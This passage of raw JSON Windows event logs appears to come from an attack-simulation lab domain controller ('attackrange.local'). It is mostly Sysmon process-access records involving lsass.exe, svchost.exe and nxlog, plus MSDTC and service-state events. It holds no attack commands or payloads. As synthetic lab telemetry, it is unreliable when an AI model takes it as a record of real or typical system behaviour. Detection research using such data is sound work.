C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:20.371","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4202,"SourceName":"Microsoft-Windows-MSDTC 2","ProviderGuid":"{5D9E0020-3761-4F36-90C8-38CE6511BD12}","Version":0,"Task":2,"OpcodeValue":0,"RecordNumber":12119,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"MSDTC started with the following settings:\r\r Security Configuration (OFF = 0 and ON = 1):\r Allow Remote Administrator = 0,\r Network Clients = 0,\r Transaction Manager Communication: \r Allow Inbound Transactions = 0,\r Allow Outbound Transactions = 0,\r Transaction Internet Protocol (TIP) = 0,\r  Enable XA Transactions = 0,\r  Enable SNA LU 6.2 Transactions = 1,\r  MSDTC Communications Security = Mutual Authentication Required,\r Account = NT AUTHORITY\\NetworkService,\r  Firewall Exclusion Detected = 0\r\r Transaction Bridge Installed = 0\r Filtering Duplicate Events = 1\r","Category":"TM","param1":"0","param2":"0","param3":"0","param4":"0","param5":"0","param6":"0","param7":"1","param8":"Mutual Authentication Required","param9":"NT AUTHORITY\\NetworkService","param10":"0","param11":"0","param12":"1","EventReceivedTime":"2020-08-01 06:51:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":900,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12120,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service is starting.\r\nParameters:<none>","EventReceivedTime":"2020-08-01 06:51:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.201\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.201","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.201\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.201","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.201\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.201","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76846,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The Connected Devices Platform Service service entered the stopped state.","param1":"Connected Devices Platform Service","param2":"stopped","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.232\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001031CF0000}\r\nSourceProcessId: 1324\r\nSourceThreadId: 1472\r\nSourceImage: C:\\Windows\\System32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1440\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+2e77|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.232","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001031CF0000}","SourceProcessId":"1324","SourceThreadId":"1472","SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1440","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+2e77|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.232\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001031CF0000}\r\nSourceProcessId: 1324\r\nSourceThreadId: 1472\r\nSourceImage: C:\\Windows\\System32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1440\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+4609|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.232","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001031CF0000}","SourceProcessId":"1324","SourceThreadId":"1472","SourceImage":"C:\\Windows\\System32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1440","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\ncbservice.dll+2f95|c:\\windows\\system32\\ncbservice.dll+4609|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.326\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.326","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 